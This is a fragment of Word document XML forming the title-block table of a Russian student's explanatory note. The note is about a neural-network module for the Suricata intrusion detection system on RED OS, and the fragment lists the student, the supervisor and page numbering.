              <w:szCs w:val="40"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:t xml:space="preserve">                  </w:t>
          </w:r>
          <w:r w:rsidRPr="00512D96">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:t xml:space="preserve">МИВУ.10.03.01-07.000   </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:t xml:space="preserve">    </w:t>
          </w:r>
          <w:r w:rsidR="00751F4F">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:t>ПЗ</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="00361A27" w14:paraId="43F2CFF2" w14:textId="77777777" w:rsidTr="005541FA">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="393" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:left w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="44CECB47" w14:textId="77777777" w:rsidR="00361A27" w:rsidRPr="00984376" w:rsidRDefault="00361A27">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="561" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="4C593883" w14:textId="77777777" w:rsidR="00361A27" w:rsidRPr="00984376" w:rsidRDefault="00361A27">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1400" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="15D9CBA4" w14:textId="77777777" w:rsidR="00361A27" w:rsidRPr="00984376" w:rsidRDefault="00361A27">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="730" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="5F660215" w14:textId="77777777" w:rsidR="00361A27" w:rsidRPr="00984376" w:rsidRDefault="00361A27">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="561" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="676ABF9C" w14:textId="77777777" w:rsidR="00361A27" w:rsidRPr="00984376" w:rsidRDefault="00361A27">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="6731" w:type="dxa"/>
          <w:gridSpan w:val="6"/>
          <w:vMerge/>
          <w:tcBorders>
            <w:right w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="63EE31A1" w14:textId="77777777" w:rsidR="00361A27" w:rsidRPr="00984376" w:rsidRDefault="00361A27">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="00361A27" w14:paraId="70E4F177" w14:textId="77777777" w:rsidTr="005541FA">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="393" w:type="dxa"/>
          <w:tcBorders>
            <w:left w:val="nil"/>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="55204450" w14:textId="201C95C1" w:rsidR="00361A27" w:rsidRPr="00984376" w:rsidRDefault="00751F4F" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Изм</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="561" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="51E9A341" w14:textId="7DF0EFBF" w:rsidR="00361A27" w:rsidRPr="00984376" w:rsidRDefault="00751F4F" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Лист</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1400" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="0B28C790" w14:textId="787EAD44" w:rsidR="00361A27" w:rsidRPr="00984376" w:rsidRDefault="00751F4F" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>№ докум.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="730" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="367C95B6" w14:textId="61FABC89" w:rsidR="00361A27" w:rsidRPr="00984376" w:rsidRDefault="00751F4F" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Подп.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="561" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="64883C02" w14:textId="56A7121E" w:rsidR="00361A27" w:rsidRPr="00984376" w:rsidRDefault="00751F4F" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Дата</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="6731" w:type="dxa"/>
          <w:gridSpan w:val="6"/>
          <w:vMerge/>
          <w:tcBorders>
            <w:right w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="71DAC5D8" w14:textId="77777777" w:rsidR="00361A27" w:rsidRPr="00984376" w:rsidRDefault="00361A27">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="00751F4F" w14:paraId="5CF536FA" w14:textId="77777777" w:rsidTr="005541FA">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="954" w:type="dxa"/>
          <w:gridSpan w:val="2"/>
          <w:tcBorders>
            <w:left w:val="nil"/>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="0277843F" w14:textId="5CDC8314" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:ind w:left="57"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Студент</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1400" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="3E191896" w14:textId="6B942255" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00D07A04" w:rsidP="00D07A04">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Мошков Т. Д.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="730" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="63D11912" w14:textId="77777777" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="561" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="67BBAB91" w14:textId="77777777" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F" w:rsidP="008041DB">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3924" w:type="dxa"/>
          <w:vMerge w:val="restart"/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="25B1C653" w14:textId="43624367" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00891157" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00891157">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t xml:space="preserve">«Разработка нейросетевого модуля системы обнаружения вторжений </w:t>
          </w:r>
          <w:proofErr w:type="spellStart"/>
          <w:r w:rsidRPr="00891157">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Suricata</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:r w:rsidRPr="00891157">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t xml:space="preserve"> на базе РЕД ОС для повышения точности детекции аномалий в сетевом трафике»</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="843" w:type="dxa"/>
          <w:gridSpan w:val="3"/>
        </w:tcPr>
        <w:p w14:paraId="48838013" w14:textId="65E4ADA4" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Лит.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="954" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="77D52314" w14:textId="0166F15F" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Лист</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1010" w:type="dxa"/>
          <w:tcBorders>
            <w:right w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="46AFAFB9" w14:textId="39428B96" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Листов</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="00751F4F" w14:paraId="106D18AD" w14:textId="77777777" w:rsidTr="005541FA">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="954" w:type="dxa"/>
          <w:gridSpan w:val="2"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:left w:val="nil"/>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="4883C396" w14:textId="220EA14A" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:ind w:left="57"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:proofErr w:type="spellStart"/>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Руков</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1400" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="01F327AA" w14:textId="4927F062" w:rsidR="00751F4F" w:rsidRPr="00D07A04" w:rsidRDefault="00D07A04" w:rsidP="00D07A04">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00D07A04">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
            </w:rPr>
            <w:t xml:space="preserve">Шапошников </w:t>
          </w:r>
          <w:r w:rsidR="005541FA" w:rsidRPr="00D07A04">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
            </w:rPr>
            <w:t>О. С.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="730" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="684553E3" w14:textId="77777777" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="561" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="46B00EF9" w14:textId="77777777" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F" w:rsidP="008041DB">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3924" w:type="dxa"/>
          <w:vMerge/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="6B3B3953" w14:textId="77777777" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="281" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="5A13214F" w14:textId="03369C78" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>у</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="281" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="2AF1ACCA" w14:textId="77777777" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="281" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="147E9A1A" w14:textId="77777777" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="00751F4F" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="954" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="57EA8D51" w14:textId="2F5B19AD" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="004B538F" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>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Arabic  \* MERGEFORMAT </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00907A58">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>6</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1010" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            <w:right w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="5C3C4D44" w14:textId="502CA5A7" w:rsidR="00751F4F" w:rsidRPr="00984376" w:rsidRDefault="004B538F" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>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NUMPAGES   \* MERGEFORMAT </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00907A58">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>7</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
